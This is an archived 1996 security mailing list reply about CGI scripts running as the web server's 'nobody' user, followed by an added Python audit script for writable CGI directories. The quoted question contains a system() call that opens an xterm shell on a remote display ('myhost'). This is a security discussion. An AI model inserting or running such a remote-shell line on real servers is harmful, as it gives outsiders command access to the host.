[3676] in WWW Security List Archive


Re: Hole: nobody shell

daemon@ATHENA.MIT.EDU (Paul Phillips)
Wed Dec 4 03:39:50 1996

Date: Tue, 3 Dec 1996 21:26:49 -0800 (PST)
From: Paul Phillips <psp@well.com>
To: Andrea Di Fabio <fabio@cs.odu.edu>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <Pine.3.91.961203114100.25652A-100000@pitfall.cs.odu.edu>
Errors-To: owner-www-security@ns2.rutgers.edu



On Tue, 3 Dec 1996, Andrea Di Fabio wrote:

> I was experimenting with cgi scripts when I came up with this idea:
> 
> What if I have a cgi script which does the following:
> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")

What if you have a CGI script which does... anything?

If you can write CGIs to be executed by the server as nobody, you don't
need an xterm to get a shell.  You've already got a shell.  That's what
you used to execute the system command.

There's no way to protect yourself from this if arbitrary users are
allowed to place arbitrary scripts to be run by the webserver UID.  You
can use CGIwrap to have them run as the script owner instead of nobody,
if you're afraid of what they might do with such power; but if the
presumption is that they already have user accounts, there's not a whole
lot more they can do.

--
Paul Phillips <psp@well.com>
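
An added example, not part of the message above or of the archive: a Python audit for the condition the reply describes, where accounts other than the administrator can place or change scripts that the web server executes under its own UID. The function names, the trusted-UID set and the sample file names are assumptions, and the sample files are constructed in a temporary directory.

```python
import os
import stat
import tempfile

def _reasons(st, trusted_uids):
    """Why this inode lets an untrusted account control server-run code."""
    reasons = []
    if st.st_uid not in trusted_uids:
        reasons.append("owner uid %d is not trusted" % st.st_uid)
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    elif st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    return reasons

def audit_cgi_dir(cgi_dir, trusted_uids=frozenset({0})):
    """Return sorted (path, reason) findings for a CGI directory tree.

    Directories are checked as well as files: write access to the
    directory is enough to add or replace a script.
    """
    findings = []
    for root, _dirs, files in os.walk(cgi_dir):
        for path in [root] + [os.path.join(root, f) for f in files]:
            st = os.lstat(path)  # lstat: do not follow symlinks
            if stat.S_ISLNK(st.st_mode):
                findings.append((path, "symlink, target not audited"))
                continue
            findings.extend((path, r) for r in _reasons(st, trusted_uids))
    return sorted(findings)

def demo(trusted_uids=None):
    """Audit a constructed CGI directory; returns (basename, reason) pairs."""
    if trusted_uids is None:
        trusted_uids = {os.getuid()}  # assumption: current user is the admin
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o755)
        # Constructed sample scripts: one sane mode, one world-writable.
        for name, mode in (("search.cgi", 0o755), ("upload.cgi", 0o777)):
            path = os.path.join(d, name)
            with open(path, "w") as f:
                f.write("#!/bin/sh\necho 'Content-type: text/plain'\n")
            os.chmod(path, mode)
        found = audit_cgi_dir(d, trusted_uids)
        return [(os.path.basename(p), r) for p, r in found]

if __name__ == "__main__":
    for name, reason in demo():
        print(name, "->", reason)
```

Any finding means the script effectively runs with the web server's privileges on behalf of whoever can write it, which is the case where a wrapper such as CGIwrap is used to run it as the script owner instead.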

